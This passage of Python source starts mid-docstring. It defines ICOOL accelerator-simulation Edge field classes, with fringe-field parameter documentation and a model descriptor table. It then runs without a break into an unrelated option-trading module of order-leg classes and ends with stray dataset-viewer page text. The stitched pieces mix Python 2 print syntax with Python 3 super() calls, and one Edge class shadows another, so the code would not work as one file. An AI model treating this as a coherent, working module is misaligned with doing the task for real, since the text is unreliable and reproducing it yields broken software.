    The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
    position and transverse momentum due to the fringe field.
    """

    def __init__(
            self,
            edge_type,
            model,
            model_parameters_list,
            name=None,
            metadata=None):
        PseudoRegion.__init__(self, name, metadata)
        self.edge_type = edge_type
        self.model = model
        # Bug fix: the original assigned the undefined name
        # 'model_parameters' (the parameter is 'model_parameters_list'),
        # raising NameError on every instantiation.
        self.model_parameters = model_parameters_list
class Edge(Field):
    """
    EDGE
    1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
    2.1) model # (I) {1}
    2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
    Edge type = SOL
    p1: BS [T]
    If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
    Edge type = DIP
    p1: BY [T]
    Edge type = HDIP
    p1: BX [T]
    Edge type = DIP3
    p1: rotation angle [deg]
    p2: BY0 [T]
    p3: flag 1:in 2:out
    Edge type = QUAD
    p1: gradient [T/m]
    Edge type = SQUA
    p1: gradient [T/m]
    Edge type = SEX
    p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
    Edge type = BSOL
    p1: BS [T]
    p2: BY [T]
    p3: 0 for entrance face, 1 for exit face
    Edge type = FACE
    This gives vertical focusing from rotated pole faces.
    p1: pole face angle [deg]
    p2: radius of curvature of reference particle [m]
    p3: if not 0 => correct kick by the factor 1 / (1+δ)
    p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
    If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
    The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
    transverse position and transverse momentum due to the fringe field.

    NOTE(review): this class shadows the Edge(PseudoRegion) class defined
    earlier in the module -- presumably intentional, but worth confirming.
    """
    # for001 tags delimiting the EDGE command block.
    begtag = 'EDGE'
    endtag = ''

    # Model-parameter descriptor table consumed by the Field machinery.
    models = {
        'model_descriptor': {
            'desc': 'Name of model parameter descriptor',
            'name': 'model',
            'num_parms': 6,
            'for001_format': {
                'line_splits': [
                    1,
                    5]}},
        'sol': {
            'desc': 'Solenoid',
            'doc': '',
            'icool_model_name': 'SOL',
            'parms': {
                'model': {
                    'pos': 1,
                    'type': 'String',
                    'doc': ''},
                'bs': {
                    'pos': 3,
                    'type': 'Real',
                    'doc': 'p1: BS [T] '
                    'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
                    'exit edge. (You can use this to get a tapered field profile)'}}},
    }

    def __init__(self, **kwargs):
        Field.__init__(self, 'EDGE', kwargs)

    def __call__(self, **kwargs):
        Field.__call__(self, kwargs)

    def __setattr__(self, name, value):
        # Only the literal 'EDGE' ftag is accepted; anything else is
        # reported (but not raised) and the attribute is left unset.
        if name == 'ftag':
            if value == 'EDGE':
                object.__setattr__(self, name, value)
            else:
                # Should raise exception here
                print '\n Illegal attempt to set incorrect ftag.\n'
        else:
            Field.__setattr__(self, name, value)

    def __str__(self):
        return Field.__str__(self)

    def gen_fparm(self):
        Field.gen_fparm(self)
from kaleidoscope.globals import SecType
class OrderLeg(object):
    """A single leg of an option-strategy order.

    Holds the signed quantity and the contract the leg applies to, as one
    component of an entire option strategy.
    """

    def __init__(self, quantity, contract):
        self.quantity = quantity
        self.contract = contract

    def reverse(self):
        """Reverse the position by negating the quantity."""
        self.quantity = -self.quantity
class OptionLeg(OrderLeg):
    """ Holds information of an option leg """

    def __init__(self, option, quantity):
        # Tag the leg's security type before delegating storage to OrderLeg.
        self.sec_type = SecType.OPT
        super().__init__(quantity, option)
class StockLeg(OrderLeg):
    """ Holds information of a stock leg """

    def __init__(self, symbol, quantity):
        # Tag the leg's security type before delegating storage to OrderLeg.
        self.sec_type = SecType.STK
        super().__init__(quantity, symbol)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.